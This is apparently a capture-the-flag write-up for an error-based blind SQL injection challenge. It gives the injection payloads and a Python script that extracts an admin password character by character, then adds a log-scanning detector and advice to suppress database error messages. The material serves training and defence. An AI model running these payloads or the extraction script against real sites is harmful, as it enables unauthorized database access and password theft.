
If a MySQL error occurs, the page prints the error message.

This is an Error Based Blind SQL injection problem.
I tried triggering an error using a conditional expression.
Always-true query
pw=' or id='admin' and if(1=1,1,(select 1 union select 2))%23

Always-false query
pw=' or id='admin' and if(1=2,1,(select 1 union select 2))%23

Using this, I wrote the Python code below.
```python
import requests

cookies = {'PHPSESSID': '5029udlls5r1m3m52n0crur5rh'}
url = 'https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?'
pw = ''
length = 0

# Find the length of pw: the "Subquery returns more than 1 row" error
# disappears only when the length guess is correct
for i in range(1, 99):
    payload = "pw=%27%20or%20id=%27admin%27%20and%20if(length(pw)={},1,(select%201%20union%20select%202))%23".format(i)
    new_url = url + payload
    res = requests.get(new_url, cookies=cookies)
    res.raise_for_status()
    if "Subquery returns more than 1 row" not in res.text:
        length = i
        break
print("pw length : " + str(length))

# Recover pw one character at a time (printable ASCII 33..126)
for i in range(1, length + 1):
    for j in range(33, 127):
        payload = "pw=%27%20or%20if((select%20id=%27admin%27%20and%20ord(substr(pw,{},1))={}),1,(select%201%20union%20select%202))%23".format(i, j)
        new_url = url + payload
        res = requests.get(new_url, cookies=cookies)
        res.raise_for_status()
        if "Subquery returns more than 1 row" not in res.text:
            pw += chr(j)
            print("pw: " + pw)
            break
print("pw : " + pw)
```
pw turned out to be 32 characters long, so it took quite a while..
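As an added defender-side example (my code, not part of this write-up): the log-scanning logic below decodes each request's query string and flags the error-oracle signature used above, an IF() whose false branch is the two-row "select 1 union select 2" subquery, then counts hits per client, since blind extraction sends one request per length or character guess. The log lines, IPs and path are constructed; it assumes Apache common-log style access logs.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache common-log style, not real traffic):
# two length probes and one character probe like those above, plus a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2021:10:00:01 +0900] "GET /chall/iron_golem.php?pw=%27%20or%20id=%27admin%27%20and%20if(length(pw)=1,1,(select%201%20union%20select%202))%23 HTTP/1.1" 200 512
10.0.0.5 - - [22/Jan/2021:10:00:02 +0900] "GET /chall/iron_golem.php?pw=%27%20or%20id=%27admin%27%20and%20if(length(pw)=2,1,(select%201%20union%20select%202))%23 HTTP/1.1" 200 512
10.0.0.5 - - [22/Jan/2021:10:00:03 +0900] "GET /chall/iron_golem.php?pw=%27%20or%20if((select%20id=%27admin%27%20and%20ord(substr(pw,1,1))=65),1,(select%201%20union%20select%202))%23 HTTP/1.1" 200 512
10.0.0.9 - - [22/Jan/2021:10:00:04 +0900] "GET /chall/iron_golem.php?pw=hunter2 HTTP/1.1" 200 480
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Signature of the error oracle used on this page: an IF() whose false branch is a
# scalar subquery forced to return two rows ("select 1 union select 2").
ORACLE_RE = re.compile(r"\bif\s*\(.*\(\s*select\s+\d+\s+union\s+select\s+\d+\s*\)", re.I | re.S)


def decoded_param_values(target):
    """Return every query-string value of a request target with percent-decoding applied."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [v for values in params.values() for v in values]


def classify_line(line):
    """Return (ip, 'oracle' | 'benign'), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    joined = " ".join(decoded_param_values(m["target"]))
    return m["ip"], ("oracle" if ORACLE_RE.search(joined) else "benign")


def scan(log_text, burst_threshold=2):
    """Count oracle-style requests per source IP and mark a burst at or above the threshold.

    Blind extraction needs one request per guess, so a single client producing
    many oracle hits is the signal worth alerting on.
    """
    hits = Counter()
    for line in log_text.splitlines():
        result = classify_line(line)
        if result is not None and result[1] == "oracle":
            hits[result[0]] += 1
    return {ip: {"oracle_hits": n, "burst": n >= burst_threshold} for ip, n in hits.items()}
```

Pair this with suppressing raw MySQL error text in the application response, since the oracle only works because the page echoes the error.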
